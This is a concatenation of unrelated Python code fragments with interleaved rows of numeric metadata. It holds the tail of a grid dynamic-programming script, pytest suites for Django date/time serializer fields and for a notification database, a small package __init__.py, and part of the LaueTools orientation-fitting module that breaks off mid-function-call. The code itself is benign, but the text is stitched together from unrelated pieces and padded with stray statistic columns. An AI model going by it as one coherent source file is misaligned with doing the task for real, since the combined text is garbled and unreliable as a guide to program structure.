for j in range(1,n,2):
L[i][j] = int(L[i][j])
D[0][0]=L[0][0]
for i in range(2,n,2):
D[0][i] = f(D[0][i-2],L[0][i],L[0][i-1])
D[i][0] = f(D[i-2][0],L[i][0],L[i-1][0])
for i in range(1,n):
if i%2 == 0:
for j in range(2,n,2):
if i > 1:
D[i][j] = max(D[i][j],f(D[i-2][j],L[i][j],L[i-1][j]))
D[i][j] = max(D[i][j],f(D[i][j-2],L[i][j],L[i][j-1]),f(D[i-1][j-1],L[i][j],L[i-1][j]),f(D[i-1][j-1],L[i][j],L[i][j-1]))
else:
for j in range(1,n,2):
if i > 1:
D[i][j] = max(D[i][j],f(D[i-2][j],L[i][j],L[i-1][j]))
if j > 1:
D[i][j] = max(D[i][j],f(D[i][j-2],L[i][j],L[i][j-1]))
D[i][j] = max(D[i][j],f(D[i-1][j-1],L[i][j],L[i-1][j]),f(D[i-1][j-1],L[i][j],L[i][j-1]))
D2[0][0]=L[0][0]
for i in range(2,n,2):
D2[0][i] = f(D2[0][i-2],L[0][i],L[0][i-1])
D2[i][0] = f(D2[i-2][0],L[i][0],L[i-1][0])
for i in range(1,n):
if i%2 == 0:
for j in range(2,n,2):
if i > 1:
D2[i][j] = min(D2[i][j],f(D2[i-2][j],L[i][j],L[i-1][j]))
D2[i][j] = min(D2[i][j],f(D2[i][j-2],L[i][j],L[i][j-1]),f(D2[i-1][j-1],L[i][j],L[i-1][j]),f(D2[i-1][j-1],L[i][j],L[i][j-1]))
else:
for j in range(1,n,2):
if i > 1:
D2[i][j] = min(D2[i][j],f(D2[i-2][j],L[i][j],L[i-1][j]))
if j > 1:
D2[i][j] = min(D2[i][j],f(D2[i][j-2],L[i][j],L[i][j-1]))
D2[i][j] = min(D2[i][j],f(D2[i-1][j-1],L[i][j],L[i-1][j]),f(D2[i-1][j-1],L[i][j],L[i][j-1]))
print(D[n-1][n-1],D2[n-1][n-1])
| 28.56338
| 136
| 0.370809
| 524
| 2,028
| 1.435115
| 0.053435
| 0.138298
| 0.111702
| 0.085106
| 0.890957
| 0.875
| 0.860372
| 0.801862
| 0.777926
| 0.726064
| 0
| 0.101637
| 0.27712
| 2,028
| 71
| 137
| 28.56338
| 0.411323
| 0
| 0
| 0.517857
| 0
| 0
| 0.001479
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017857
| false
| 0
| 0
| 0
| 0.071429
| 0.017857
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5ab8e4a88c8a075df7661504f604ee8dece6d854
| 4,898
|
py
|
Python
|
tests/tests/test_fields/test_datetime_fields.py
|
intellineers/django-bridger
|
ed097984a99df7da40a4d01bd00c56e3c6083056
|
[
"BSD-3-Clause"
] | 2
|
2020-03-17T00:53:23.000Z
|
2020-07-16T07:00:33.000Z
|
tests/tests/test_fields/test_datetime_fields.py
|
intellineers/django-bridger
|
ed097984a99df7da40a4d01bd00c56e3c6083056
|
[
"BSD-3-Clause"
] | 76
|
2019-12-05T01:15:57.000Z
|
2021-09-07T16:47:27.000Z
|
tests/tests/test_fields/test_datetime_fields.py
|
intellineers/django-bridger
|
ed097984a99df7da40a4d01bd00c56e3c6083056
|
[
"BSD-3-Clause"
] | 1
|
2020-02-05T15:09:47.000Z
|
2020-02-05T15:09:47.000Z
|
from datetime import date, datetime, time
import pytest
import pytz
from django.test import override_settings
from rest_framework.exceptions import ValidationError
from bridger.serializers import DateField, DateTimeField, TimeField
from bridger.serializers.fields.types import BridgerType
from ...models import ModelTest
class TestDateTimeField:
def setup_method(self):
self.field = DateTimeField()
def test_not_none(self):
assert self.field is not None
@pytest.mark.parametrize(
"input, expected",
[
("2019-01-01T10:00", datetime(2019, 1, 1, 11, 0)),
("2019-01-01T10:00Z", datetime(2019, 1, 1, 11, 0)),
("2019-01-01T10:00+0100", datetime(2019, 1, 1, 10, 0)),
("2019-01-01T10:00:00Z", datetime(2019, 1, 1, 11, 0)),
("2019-01-01T10:00:00+0000", datetime(2019, 1, 1, 11, 0)),
("2019-01-01T10:00:00+0100", datetime(2019, 1, 1, 10, 0)),
("2019-01-01T10:00:00.0000Z", datetime(2019, 1, 1, 11, 0)),
("2019-01-01T10:00:00.0000+0100", datetime(2019, 1, 1, 10, 0)),
],
)
@override_settings(TIME_ZONE="UCT", USE_TZ=True)
def test_to_internal_value(self, input, expected):
expected = pytz.timezone("Europe/Berlin").localize(expected)
assert self.field.to_internal_value(input) == expected
@pytest.mark.parametrize("input", ["", "200-00-10", [], {}, None])
def test_to_internal_value_validation_error(self, input):
with pytest.raises(ValidationError):
self.field.to_internal_value(input)
@override_settings(TIME_ZONE="Europe/Berlin")
def test_to_representation_non_utc(self):
localized_dt = pytz.timezone("Europe/Berlin").localize(datetime(2019, 1, 1, 10, 0))
assert self.field.to_representation(localized_dt) == "2019-01-01T10:00:00+0100"
@override_settings(TIME_ZONE="UCT", USE_TZ=True)
def test_to_representation_utc(self):
localized_dt = pytz.timezone("UCT").localize(datetime(2019, 1, 1, 10, 0))
assert self.field.to_representation(localized_dt) == "2019-01-01T10:00:00+0000"
def test_field_type(self):
assert self.field.field_type == BridgerType.DATETIME.value
def test_representation(self):
assert self.field.get_representation(None, "field_name") == {
"key": "field_name",
"label": None,
"type": self.field.field_type,
"required": True,
"read_only": False,
"decorators": [],
}
class TestDateField:
def setup_method(self):
self.field = DateField()
def test_not_none(self):
assert self.field is not None
@pytest.mark.parametrize(
"input, expected", [(date(2019, 1, 1), date(2019, 1, 1)), ("2019-01-01", date(2019, 1, 1))],
)
def test_to_internal_value(self, input, expected):
assert self.field.to_internal_value(input) == expected
@pytest.mark.parametrize("input", ["", "200-00-10", [], {}, None])
def test_to_internal_value_validation_error(self, input):
with pytest.raises(ValidationError):
self.field.to_internal_value(input)
def test_to_representation(self):
assert self.field.to_representation(date(2019, 1, 1)) == "2019-01-01"
def test_field_type(self):
assert self.field.field_type == BridgerType.DATE.value
def test_representation(self):
assert self.field.get_representation(None, "field_name") == {
"key": "field_name",
"label": None,
"type": self.field.field_type,
"required": True,
"read_only": False,
"decorators": [],
}
class TestTimeField:
def setup_method(self):
self.field = TimeField()
def test_not_none(self):
assert self.field is not None
@pytest.mark.parametrize(
"input, expected",
[(time(10, 0), time(10, 0)), ("10:00", time(10, 0)), ("10:00:00", time(10, 0)), ("10:00:00.0000", time(10, 0)),],
)
def test_to_internal_value(self, input, expected):
assert self.field.to_internal_value(input) == expected
@pytest.mark.parametrize("input", ["", "111", [], {}, None])
def test_to_internal_value_validation_error(self, input):
with pytest.raises(ValidationError):
self.field.to_internal_value(input)
def test_to_representation(self):
assert self.field.to_representation(time(10, 0, 0, 0)) == "10:00:00"
def test_field_type(self):
assert self.field.field_type == BridgerType.TIME.value
def test_representation(self):
assert self.field.get_representation(None, "field_name") == {
"key": "field_name",
"label": None,
"type": self.field.field_type,
"required": True,
"read_only": False,
"decorators": [],
}
| 35.751825
| 121
| 0.623724
| 623
| 4,898
| 4.741573
| 0.139647
| 0.076168
| 0.081246
| 0.070752
| 0.820582
| 0.80264
| 0.751523
| 0.722749
| 0.712593
| 0.703114
| 0
| 0.095327
| 0.231115
| 4,898
| 136
| 122
| 36.014706
| 0.68906
| 0
| 0
| 0.574074
| 0
| 0
| 0.119232
| 0.034912
| 0
| 0
| 0
| 0
| 0.148148
| 1
| 0.203704
| false
| 0
| 0.074074
| 0
| 0.305556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
518d1445820f38b784ee88854d48060963cc5ebd
| 9,565
|
py
|
Python
|
tests/db/test_db.py
|
dpays/dsocial-notifications
|
32b1cdcd58d622407fd50206053c5b9735a56ba9
|
[
"MIT"
] | 10
|
2017-10-22T20:07:40.000Z
|
2018-08-01T21:48:49.000Z
|
tests/db/test_db.py
|
dpays/dsocial-notifications
|
32b1cdcd58d622407fd50206053c5b9735a56ba9
|
[
"MIT"
] | 81
|
2017-08-19T15:38:32.000Z
|
2020-05-12T09:56:14.000Z
|
tests/db/test_db.py
|
dpays/dsocial-notifications
|
32b1cdcd58d622407fd50206053c5b9735a56ba9
|
[
"MIT"
] | 9
|
2017-09-19T07:12:20.000Z
|
2021-05-25T17:09:27.000Z
|
# -*- coding: utf-8 -*-
from datetime import datetime

from sqlalchemy import MetaData

# NOTE (assumed imports): the snippet omits its import block; `yojson` and the
# *_USER_TRANSPORT_SETTINGS constants are provided elsewhere in the yo package,
# and the `sqlite_db` fixture by the test conftest.
def test_schema_sqlite(sqlite_db):
"""Test init_schema creates empty tables"""
yo_db = sqlite_db
m = MetaData()
m.create_all(bind=yo_db.engine)
for table in m.tables.values():
with yo_db.acquire_conn() as conn:
query = table.select().where(True)
response = conn.execute(query).fetchall()
assert len(response) == 0, '%s should have 0 rows' % table
def test_create_notification(sqlite_db):
vote_data = {
'author': 'testuser1336',
'weight': 100,
'item': {
'author': 'testuser1337',
'permlink': 'test-post-1',
'summary': 'A test post',
'category': 'test',
'depth': 0
}
}
test_data = {
'json_data': yojson.dumps(vote_data),
'to_username': 'testuser1337',
'from_username': 'testuser1336',
'notify_type': 'vote',
'trx_id': '123abc'
}
yo_db = sqlite_db
retval = yo_db.create_db_notification(**test_data)
assert retval is True
result = yo_db.get_db_notifications(to_username='testuser1337',
limit=2)
assert len(result) == 1
result = result[0]
assert result['notify_type'] == 'vote'
assert result['to_username'] == 'testuser1337'
assert result['from_username'] == 'testuser1336'
assert yojson.loads(result['json_data']) == vote_data
assert isinstance(result['created'], datetime)
# notifications only columns
assert result['trx_id'] == '123abc'
def test_create_wwwpoll_notification(sqlite_db):
vote_data = {
'author': 'testuser1336',
'weight': 100,
'item': {
'author': 'testuser1337',
'permlink': 'test-post-1',
'summary': 'A test post',
'category': 'test',
'depth': 0
}
}
test_data = {
'json_data': yojson.dumps(vote_data),
'from_username': 'testuser1336',
'to_username': 'testuser1337',
'notify_type': 'vote'
}
yo_db = sqlite_db
retval = yo_db.create_wwwpoll_notification(**test_data)
assert retval is True
result = yo_db.get_wwwpoll_notifications(to_username='testuser1337',
limit=2)
assert len(result) == 1
result = result[0]
assert result['notify_type'] == 'vote'
assert result['to_username'] == 'testuser1337'
assert yojson.loads(result['json_data']) == vote_data
assert isinstance(result['created'], datetime)
# wwwpoll only columns
assert result['read'] == False
assert result['shown'] == False
def test_get_notifications(sqlite_db):
vote_data = {
'author': 'testuser1336',
'weight': 100,
'item': {
'author': 'testuser1337',
'permlink': 'test-post-1',
'summary': 'A test post',
'category': 'test',
'depth': 0
}
}
test_data = {
'json_data': yojson.dumps(vote_data),
'to_username': 'testuser1337',
'from_username': 'testuser1336',
'notify_type': 'vote',
'trx_id': '123abc'
}
yo_db = sqlite_db
retval = yo_db.create_db_notification(**test_data)
assert retval is True
result = yo_db.get_db_notifications(to_username='testuser1337',
limit=2)
assert len(result) == 1
result = result[0]
assert result['notify_type'] == 'vote'
assert result['to_username'] == 'testuser1337'
assert result['from_username'] == 'testuser1336'
assert yojson.loads(result['json_data']) == vote_data
assert isinstance(result['created'], datetime)
# notifications only columns
assert result['trx_id'] == '123abc'
def test_get_wwwpoll_notifications(sqlite_db):
vote_data = {
'author': 'testuser1336',
'weight': 100,
'item': {
'author': 'testuser1337',
'permlink': 'test-post-1',
'summary': 'A test post',
'category': 'test',
'depth': 0
}
}
test_data = {
'json_data': yojson.dumps(vote_data),
'from_username': 'testuser1336',
'to_username': 'testuser1337',
'notify_type': 'vote',
}
yo_db = sqlite_db
retval = yo_db.create_wwwpoll_notification(**test_data)
assert retval is True
result = yo_db.get_wwwpoll_notifications(to_username='testuser1337',
limit=2)
assert len(result) == 1
result = result[0]
assert result['notify_type'] == 'vote'
assert result['to_username'] == 'testuser1337'
assert yojson.loads(result['json_data']) == vote_data
assert isinstance(result['created'], datetime)
# wwwpoll only columns
assert result['read'] == False
assert result['shown'] == False
def test_wwwpoll_mark_shown(sqlite_db):
vote_data = {
'author': 'testuser1336',
'weight': 100,
'item': {
'author': 'testuser1337',
'permlink': 'test-post-1',
'summary': 'A test post',
'category': 'test',
'depth': 0
}
}
test_data = {
'json_data': yojson.dumps(vote_data),
'from_username': 'testuser1336',
'to_username': 'testuser1337',
'notify_type': 'vote'
}
yo_db = sqlite_db
_ = yo_db.create_wwwpoll_notification(**test_data)
result = yo_db.get_wwwpoll_notifications(to_username='testuser1337')[0]
assert result['shown'] is False
_ = yo_db.wwwpoll_mark_shown(result['nid'])
assert _ is True
result = yo_db.get_wwwpoll_notifications(to_username='testuser1337')[0]
assert result['shown'] is True
def test_wwwpoll_mark_unshown(sqlite_db):
vote_data = {
'author': 'testuser1336',
'weight': 100,
'item': {
'author': 'testuser1337',
'permlink': 'test-post-1',
'summary': 'A test post',
'category': 'test',
'depth': 0
}
}
test_data = {
'json_data': yojson.dumps(vote_data),
'from_username': 'testuser1336',
'to_username': 'testuser1337',
'notify_type': 'vote',
'shown': True
}
yo_db = sqlite_db
_ = yo_db.create_wwwpoll_notification(**test_data)
result = yo_db.get_wwwpoll_notifications(to_username='testuser1337')[0]
assert result['shown'] is True
_ = yo_db.wwwpoll_mark_unshown(result['nid'])
assert _ is True
result = yo_db.get_wwwpoll_notifications(to_username='testuser1337')[0]
assert result['shown'] is False
def test_wwwpoll_mark_read(sqlite_db):
vote_data = {
'author': 'testuser1336',
'weight': 100,
'item': {
'author': 'testuser1337',
'permlink': 'test-post-1',
'summary': 'A test post',
'category': 'test',
'depth': 0
}
}
test_data = {
'json_data': yojson.dumps(vote_data),
'from_username': 'testuser1336',
'to_username': 'testuser1337',
'notify_type': 'vote'
}
yo_db = sqlite_db
_ = yo_db.create_wwwpoll_notification(**test_data)
result = yo_db.get_wwwpoll_notifications(to_username='testuser1337')[0]
assert result['read'] is False
_ = yo_db.wwwpoll_mark_read(result['nid'])
assert _ is True
result = yo_db.get_wwwpoll_notifications(to_username='testuser1337')[0]
assert result['read'] is True
def test_wwwpoll_mark_unread(sqlite_db):
vote_data = {
'author': 'testuser1336',
'weight': 100,
'item': {
'author': 'testuser1337',
'permlink': 'test-post-1',
'summary': 'A test post',
'category': 'test',
'depth': 0
}
}
test_data = {
'json_data': yojson.dumps(vote_data),
'from_username': 'testuser1336',
'to_username': 'testuser1337',
'notify_type': 'vote',
'read': True
}
yo_db = sqlite_db
_ = yo_db.create_wwwpoll_notification(**test_data)
result = yo_db.get_wwwpoll_notifications(to_username='testuser1337')[0]
assert result['read'] is True
_ = yo_db.wwwpoll_mark_unread(result['nid'])
assert _ is True
result = yo_db.get_wwwpoll_notifications(to_username='testuser1337')[0]
assert result['read'] is False
def test_create_user(sqlite_db):
yo_db = sqlite_db
result = yo_db.create_user(username='testuser')
assert result is True
transports = yo_db.get_user_transports(username='testuser')
assert transports == DEFAULT_USER_TRANSPORT_SETTINGS
def test_get_user_transports_user_doesnt_exist(sqlite_db):
yo_db = sqlite_db
transports = yo_db.get_user_transports(username='testuser')
assert transports == DEFAULT_USER_TRANSPORT_SETTINGS
def test_get_user_transports_user_exists(sqlite_db):
yo_db = sqlite_db
result = yo_db.set_user_transports(username='testuser',
transports=TEST_USER_TRANSPORT_SETTINGS)
assert result is True
transports = yo_db.get_user_transports(username='testuser')
assert transports == TEST_USER_TRANSPORT_SETTINGS
def test_set_user_transports(sqlite_db):
yo_db = sqlite_db
_ = yo_db.set_user_transports(username='testuser',
transports=TEST_USER_TRANSPORT_SETTINGS)
assert yo_db.get_user_transports(username='testuser')
| 29.072948
| 79
| 0.593204
| 1,047
| 9,565
| 5.13085
| 0.095511
| 0.034252
| 0.098287
| 0.029039
| 0.920514
| 0.909531
| 0.884587
| 0.877699
| 0.877699
| 0.867275
| 0
| 0.039925
| 0.279875
| 9,565
| 328
| 80
| 29.161585
| 0.739983
| 0.016309
| 0
| 0.790875
| 0
| 0
| 0.211299
| 0
| 0
| 0
| 0
| 0
| 0.193916
| 1
| 0.04943
| false
| 0
| 0
| 0
| 0.04943
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
51ba2f553a59423ee0c33c384ecf1a568ac7029c
| 132
|
py
|
Python
|
topicmodels/__init__.py
|
llaurabat91/topic-modelling-tools
|
9b53f52e5671005642faf065e993e19f0b249e5c
|
[
"MIT"
] | null | null | null |
topicmodels/__init__.py
|
llaurabat91/topic-modelling-tools
|
9b53f52e5671005642faf065e993e19f0b249e5c
|
[
"MIT"
] | null | null | null |
topicmodels/__init__.py
|
llaurabat91/topic-modelling-tools
|
9b53f52e5671005642faf065e993e19f0b249e5c
|
[
"MIT"
] | null | null | null |
#from preprocess import *
#from bow import *
from .preprocess import *
from .bow import *
from . import LDA
from . import multimix
| 16.5
| 25
| 0.734848
| 18
| 132
| 5.388889
| 0.333333
| 0.412371
| 0.412371
| 0.494845
| 0.721649
| 0.721649
| 0.721649
| 0
| 0
| 0
| 0
| 0
| 0.189394
| 132
| 7
| 26
| 18.857143
| 0.906542
| 0.310606
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
51c436f8a1fe9a9cea19ae4ef38c82cf04e5146e
| 123,175
|
py
|
Python
|
lauetoolsnn/lauetools/FitOrient.py
|
ravipurohit1991/lauetoolsnn
|
6cc413fb60872297c9ca7a202dd9dd596d4a9a5b
|
[
"MIT"
] | null | null | null |
lauetoolsnn/lauetools/FitOrient.py
|
ravipurohit1991/lauetoolsnn
|
6cc413fb60872297c9ca7a202dd9dd596d4a9a5b
|
[
"MIT"
] | null | null | null |
lauetoolsnn/lauetools/FitOrient.py
|
ravipurohit1991/lauetoolsnn
|
6cc413fb60872297c9ca7a202dd9dd596d4a9a5b
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Module of Lauetools project
JS Micha Feb 2012
module to fit orientation and strain
http://sourceforge.net/projects/lauetools/
"""
__author__ = "Jean-Sebastien Micha, CRG-IF BM32 @ ESRF"
from scipy.optimize import leastsq, least_squares
import numpy as np
np.set_printoptions(precision=15)
from scipy.linalg import qr
try:
from lauetools import CrystalParameters as CP
from lauetools import generaltools as GT
from lauetools import LaueGeometry as F2TC
from lauetools import dict_LaueTools as DictLT
from lauetools.dict_LaueTools import DEG
except ImportError:
import lauetoolsnn.lauetools.CrystalParameters as CP
import lauetoolsnn.lauetools.generaltools as GT
import lauetoolsnn.lauetools.LaueGeometry as F2TC
import lauetoolsnn.lauetools.dict_LaueTools as DictLT
from lauetoolsnn.lauetools.dict_LaueTools import DEG
RAD = 1.0 / DEG
IDENTITYMATRIX = np.eye(3)
def remove_harmonic(hkl, uflab, yz):
# print "removing harmonics from theoretical peak list"
nn = len(uflab[:, 0])
isbadpeak = np.zeros(nn, dtype=int)  # np.int is removed in recent NumPy
toluf = 0.05
for i in list(range(nn)):
if isbadpeak[i] == 0:
for j in list(range(i + 1, nn)):
if isbadpeak[j] == 0:
if GT.norme_vec(uflab[j, :] - uflab[i, :]) < toluf:
isbadpeak[j] = 1
# print "harmonics :"
# print hkl[i,:]
# print hkl[j,:]
# print "isbadpeak = ", isbadpeak
index_goodpeak = np.where(isbadpeak == 0)
# print "index_goodpeak =", index_goodpeak
hkl2 = hkl[index_goodpeak]
uflab2 = uflab[index_goodpeak]
yz2 = yz[index_goodpeak]
nspots2 = len(hkl2[:, 0])
return (hkl2, uflab2, yz2, nspots2, isbadpeak)
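# Illustrative check of the criterion above (not from the original module):
# two reflections are merged as harmonics when their uflab direction vectors
# lie closer than toluf = 0.05 in Euclidean norm, e.g.
# >>> GT.norme_vec(np.array([0., 0., 1.001]) - np.array([0., 0., 1.])) < 0.05
# True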
def xy_from_Quat(varying_parameter_values, DATA_Q, nspots, varying_parameter_indices,
allparameters,
initrot=None,
vecteurref=IDENTITYMATRIX,
pureRotation=0,
labXMAS=0,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
kf_direction="Z>0"):
"""
compute x and y pixel positions of Laue spots given hkl list
DATA_Q: array of all 3 elements miller indices
nspots: indices of selected spots of DATA_Q
initrot: initial orientation matrix (rotation and distorsion)
varying_parameter_values: array of value that will be taken into account
varying_parameter_indices: list of indices (element position) of
varying parameters in allparameters array
allparameters: array of 8 elements: 5 first of calibration parameters
and 3 of angles defining quaternion
WARNING: All miller indices must be entered in DATA_Q, selection is done in xy_from_Quat
WARNING2: len(varying_parameter_values)=len(varying_parameter_indices)
returns:
array of x y pixel positions of Laue peaks
"""
allparameters.put(varying_parameter_indices, varying_parameter_values)
calibration_parameters = allparameters[:5]
# selecting nspots of DATA_Q
DATAQ = np.take(DATA_Q, nspots, axis=0)
trQ = np.transpose(DATAQ) # np.array(Hs, Ks,Ls) for further computations
if initrot is not None:
# R is a pure rotation
# dot(R,Q)=initrot
# Q may be viewed as lattice distortion
if pureRotation: # extract pure rotation matrix from UB matrix
R, Q = qr(initrot)
R = R / np.sign(np.diag(Q))
else: # keep UB matrix rotation + distorsion
R = initrot
# initial lattice rotation and distorsion (/ cubic structure) q = U*B * Q
trQ = np.dot(np.dot(R, vecteurref), trQ)
# results are qx,qy,qz
else:
print("I DONT LIKE INITROT == None")
print("this must mean that INITROT = Identity ?...")
if 0:
angle_Quat = allparameters[5:8] # three angles of quaternion
# with sample rotation
# print "3 angles representation of quaternion",angle_Quat
Quat = GT.from3rotangles_toQuat(angle_Quat)
# print "Quat",Quat
matfromQuat = np.array(GT.fromQuat_to_MatrixRot(Quat))
# print "matfromQuat", matfromQuat
else:
matfromQuat = np.eye(3)
Qrot = np.dot(matfromQuat, trQ) # lattice rotation due to quaternion
Qrotn = np.sqrt(np.sum(Qrot ** 2, axis=0)) # norms of Q vectors
twthe, chi = F2TC.from_qunit_to_twchi(1.*Qrot / Qrotn)
# if verbose:
# print("matfromQuat", matfromQuat)
# print("tDATA_Q", np.transpose(DATA_Q))
# print("Qrot", Qrot)
# print("Qrotn", Qrotn)
# print("Qrot/Qrotn", Qrot / Qrotn)
# print("twthe,chi", twthe, chi)
X, Y, theta = F2TC.calc_xycam_from2thetachi(twthe,
chi,
calibration_parameters,
verbose=0,
pixelsize=pixelsize,
kf_direction=kf_direction)
return X, Y, theta, R
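# Hedged usage sketch (all values illustrative): allparameters packs the 5
# detector calibration values followed by the 3 quaternion angles, and the
# first 5 are marked as the varying slice, mirroring the calls made by the
# strain error functions below:
# allparams = np.array([70.0, 1024.0, 1024.0, 0.0, 0.0, 0.0, 0.0, 0.0])
# X, Y, theta, R = xy_from_Quat(allparams[:5], hkl_array,
#                               np.arange(len(hkl_array)), np.arange(5),
#                               allparams, initrot=np.eye(3))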
def calc_XY_pixelpositions(calibration_parameters, DATA_Q, nspots, UBmatrix=None,
B0matrix=IDENTITYMATRIX,
offset=0,
pureRotation=0,
labXMAS=0,
verbose=0,
pixelsize=0.079,
dim=(2048, 2048),
kf_direction="Z>0"):
"""
must: len(varying_parameter_values)=len(varying_parameter_indices)
DATA_Q: array of all 3 elements miller indices
nspots: indices of selected spots of DATA_Q
UBmatrix:
WARNING: All miller indices must be entered in DATA_Q, selection is done in xy_from_Quat
returns:
"""
# selecting nspots of DATA_Q
# print "DATA_Q in calc_XY_pixelpositions", DATA_Q
# print "nspots", nspots
# print "len(DATA_Q)", len(DATA_Q)
DATAQ = np.take(DATA_Q, nspots, axis=0)
trQ = np.transpose(DATAQ) # np.array(Hs, Ks,Ls) for further computations
# print "DATAQ in xy_from_Quat", DATAQ
if UBmatrix is not None:
R = UBmatrix
# q = UB * B0 * Q
trQ = np.dot(np.dot(R, B0matrix), trQ)
# results are qx,qy,qz
else:
print("I DON'T LIKE INITROT == None")
print("this must mean that INITROT = Identity ?...")
Qrot = trQ # lattice rotation due to quaternion
Qrotn = np.sqrt(np.sum(Qrot ** 2, axis=0)) # norms of Q vectors
twthe, chi = F2TC.from_qunit_to_twchi(Qrot / Qrotn, labXMAS=labXMAS)
# print "twthe, chi", twthe, chi
if verbose:
print("tDATA_Q", np.transpose(DATA_Q))
print("Qrot", Qrot)
print("Qrotn", Qrotn)
print("Qrot/Qrotn", Qrot / Qrotn)
print("twthe,chi", twthe, chi)
X, Y, theta = F2TC.calc_xycam_from2thetachi(
twthe,
chi,
calibration_parameters,
offset=offset,
verbose=0,
pixelsize=pixelsize,
kf_direction=kf_direction)
return X, Y, theta, R
def error_function_on_demand_calibration(param_calib,
DATA_Q,
allparameters,
arr_indexvaryingparameters,
nspots,
pixX,
pixY,
initrot=IDENTITYMATRIX,
vecteurref=IDENTITYMATRIX,
pureRotation=1,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
weights=None,
allspots_info=0,
kf_direction="Z>0"):
"""
#All miller indices must be entered in DATA_Q,
selection is done in xy_from_Quat with nspots (array of indices)
# param_orient is three elements array representation of quaternion
"""
mat1, mat2, mat3 = IDENTITYMATRIX, IDENTITYMATRIX, IDENTITYMATRIX
invsq2 = 1 / np.sqrt(2)
AXIS1, AXIS2, AXIS3 = np.array([[invsq2, -.5, .5], [invsq2, .5, -.5], [0, invsq2, invsq2]])
if 5 in arr_indexvaryingparameters:
ind1 = np.where(arr_indexvaryingparameters == 5)[0][0]
if len(arr_indexvaryingparameters) > 1:
a1 = param_calib[ind1] * DEG
else:
a1 = param_calib[0] * DEG
# print "a1 (rad)= ",a1
mat1 = np.array([[np.cos(a1), 0, np.sin(a1)],
[0, 1, 0],
[-np.sin(a1), 0, np.cos(a1)]])
mat1 = GT.matRot(AXIS1, a1/DEG)
if 6 in arr_indexvaryingparameters:
ind2 = np.where(arr_indexvaryingparameters == 6)[0][0]
if len(arr_indexvaryingparameters) > 1:
a2 = param_calib[ind2] * DEG
else:
a2 = param_calib[0] * DEG
# print "a2 (rad)= ",a2
mat2 = np.array([[1, 0, 0],
[0, np.cos(a2), np.sin(a2)],
[0, np.sin(-a2), np.cos(a2)]])
mat2 = GT.matRot(AXIS2, a2/DEG)
if 7 in arr_indexvaryingparameters:
ind3 = np.where(arr_indexvaryingparameters == 7)[0][0]
if len(arr_indexvaryingparameters) > 1:
a3 = param_calib[ind3] * DEG
else:
a3 = param_calib[0] * DEG
mat3 = np.array([[np.cos(a3), -np.sin(a3), 0],
[np.sin(a3), np.cos(a3), 0],
[0, 0, 1]])
mat3 = GT.matRot(AXIS3, a3/DEG)
deltamat = np.dot(mat3, np.dot(mat2, mat1))
newmatrix = np.dot(deltamat, initrot)
# three last parameters are orientation angles in quaternion expression
onlydetectorindices = arr_indexvaryingparameters[arr_indexvaryingparameters < 5]
X, Y, theta, _ = xy_from_Quat(param_calib,
DATA_Q,
nspots,
onlydetectorindices,
allparameters,
initrot=newmatrix,
vecteurref=vecteurref,
pureRotation=pureRotation,
labXMAS=0,
verbose=verbose,
pixelsize=pixelsize,
dim=dim,
kf_direction=kf_direction)
distanceterm = np.sqrt((X - pixX) ** 2 + (Y - pixY) ** 2)
if (weights is not None): # take into account the exp. spots intensity as weight in cost distance function
allweights = np.sum(weights)
distanceterm = distanceterm * weights / allweights
# print "**mean weighted distanceterm ",mean(distanceterm)," ********"
# print "**mean distanceterm ",mean(distanceterm)," ********"
if allspots_info == 0:
if verbose:
# print "X",X
# print "pixX",pixX
# print "Y",Y
# print "pixY",pixY
# print "param_orient",param_calib
# print "distanceterm",distanceterm
# print "*****************mean distanceterm ",mean(distanceterm)," ********"
# print "newmatrix", newmatrix
return distanceterm, deltamat, newmatrix
else:
return distanceterm
elif allspots_info == 1:
Xtheo = X
Ytheo = Y
Xexp = pixX
Yexp = pixY
Xdev = Xtheo - Xexp
Ydev = Ytheo - Yexp
theta_theo = theta
spotsData = [Xtheo, Ytheo, Xexp, Yexp, Xdev, Ydev, theta_theo]
return distanceterm, deltamat, newmatrix, spotsData
def fit_on_demand_calibration(starting_param, miller, allparameters,
_error_function_on_demand_calibration,
arr_indexvaryingparameters,
nspots,
pixX,
pixY,
initrot=IDENTITYMATRIX,
vecteurref=IDENTITYMATRIX,
pureRotation=1,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
weights=None,
kf_direction="Z>0",
**kwd):
"""
#All miller indices must be entered in miller,
selection is done in xy_from_Quat with nspots (array of indices)
"""
parameters = ["distance (mm)",
"Xcen (pixel)",
"Ycen (pixel)",
"Angle1 (deg)",
"Angle2 (deg)",
"theta1",
"theta2",
"theta3"]
parameters_being_fitted = [parameters[k] for k in arr_indexvaryingparameters]
param_calib_0 = starting_param
if verbose:
# print(
# "\n\n***************************\nfirst error with initial values of:",
# parameters_being_fitted, " \n\n***************************\n")
_error_function_on_demand_calibration(param_calib_0,
miller,
allparameters,
arr_indexvaryingparameters,
nspots,
pixX,
pixY,
initrot=initrot,
